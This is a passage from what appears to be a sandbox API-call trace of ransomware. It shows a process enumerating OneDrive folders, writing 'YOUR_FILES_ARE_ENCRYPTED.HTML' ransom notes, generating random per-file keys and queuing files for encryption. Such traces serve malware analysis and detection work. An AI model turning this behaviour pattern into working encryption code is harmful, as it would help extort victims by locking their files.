pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et") returned 74 [0160.433] GetProcessHeap () returned 0x270000 [0160.433] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.433] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et" [0160.433] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\*" [0160.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.435] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.435] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.435] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.435] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.435] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.435] lstrlenW (lpString=".mui") returned 4 [0160.435] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.435] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.435] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.435] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.436] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.438] CloseHandle (hObject=0x5a8) returned 1 [0160.439] GetProcessHeap () returned 0x270000 [0160.439] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.439] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e90c70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e90c70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x70a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0160.440] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll") returned 82 [0160.440] lstrcmpW (lpString1="ETWlog.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.440] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0160.440] lstrlenW (lpString=".dll") returned 4 [0160.440] 
PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0160.440] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0160.440] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=28840) returned 1 [0160.440] GetProcessHeap () returned 0x270000 [0160.440] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0160.441] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="04") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="98") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="AA") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="29") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="D7") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="46") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="05") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="59") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A0") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="AE") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="54") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="91") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | 
out: param_1="BF") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="F5") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="C4") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="82") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="57") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="2C") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="81") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="40") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="0B") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="61") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="E0") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="F9") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="68") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="5F") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="7B") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="54") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="30") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="25") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C6") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="3E") returned 2 [0160.444] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll" [0160.444] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.444] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0160.444] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="eu", cAlternateFileName="")) returned 1 [0160.444] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu") returned 74 [0160.444] GetProcessHeap () returned 0x270000 [0160.444] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.444] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu" [0160.444] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\*" [0160.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.446] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0160.446] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.446] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.446] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.446] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.446] lstrlenW (lpString=".mui") returned 4 [0160.446] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.446] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.446] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.446] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\eu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0160.447] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.449] CloseHandle (hObject=0x590) returned 1 [0160.450] GetProcessHeap () returned 0x270000 [0160.450] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.450] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3f03090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3f03090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3f03090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x0, dwReserved1=0x60, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0160.451] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml") returned 89 [0160.451] lstrcmpW (lpString1="ExclusionList.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.451] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0160.451] lstrlenW (lpString=".xml") returned 4 [0160.451] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0160.451] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0160.452] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=20063) returned 1 [0160.452] 
GetProcessHeap () returned 0x270000 [0160.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0160.457] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="28") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="CA") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="73") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="44") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="56") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="8C") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="01") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="DE") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="04") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="1C") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="36") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="9B") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F0") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="CC") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A2") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="16") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="51") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="B2") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="2F") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="83") returned 2 [0160.458] wsprintfW (in: 
param_1=0x4ebd162, param_2="%02X" | out: param_1="38") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="94") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="17") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="70") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="47") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="40") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="50") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D7") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="FD") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="CC") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="55") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="46") returned 2 [0160.460] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml" [0160.460] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.460] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0160.460] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fa", cAlternateFileName="")) returned 1 [0160.460] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa") returned 74 [0160.460] GetProcessHeap () returned 0x270000 [0160.460] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.460] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa" [0160.460] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\*" [0160.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.461] FindNextFileW (in: hFindFile=0x42f3280, 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.461] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.461] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 